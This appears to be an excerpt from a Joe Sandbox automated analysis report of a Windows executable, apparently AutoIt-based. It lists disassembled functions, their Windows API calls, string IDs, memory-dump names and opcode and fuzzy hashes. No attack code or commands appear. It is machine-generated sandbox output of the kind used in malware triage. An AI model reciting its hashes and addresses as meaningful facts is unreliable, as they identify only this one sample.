                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 2294789929-1287834457
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                    • API String ID: 2483343779-2107944366
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                                    • _wcslen.LIBCMT ref: 00450720
                                                                                                                    • _wcscat.LIBCMT ref: 00450733
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                                                                                    • String ID: -----$SysListView32
                                                                                                                    • API String ID: 4008455318-3975388722
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                                                                    • GetParent.USER32 ref: 00469C98
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                                                                    • GetParent.USER32 ref: 00469CBC
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 2360848162-1403004172
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 262282135-0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                                                                    • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                                                                    • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                                                                      • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3771399671-0
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 0-1603158881
                                                                                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                    APIs
                                                                                                                    • CreateMenu.USER32 ref: 00448603
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                    • IsMenu.USER32(?), ref: 004486AB
                                                                                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 161812096-4108050209
                                                                                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                    • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 978794511-0
                                                                                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
• Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
• Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
• Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _memmove$_memcmp
• String ID: '$\$h
• API String ID: 2205784470-1303700344
• Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
• Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
• Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045EA56
• VariantCopy.OLEAUT32(00000000), ref: 0045EA60
• VariantClear.OLEAUT32 ref: 0045EA6D
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
• __swprintf.LIBCMT ref: 0045EC33
• VariantInit.OLEAUT32(00000000), ref: 0045ECEE
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Variant$InitTime$ClearCopySystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 2441338619-1568723262
• Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
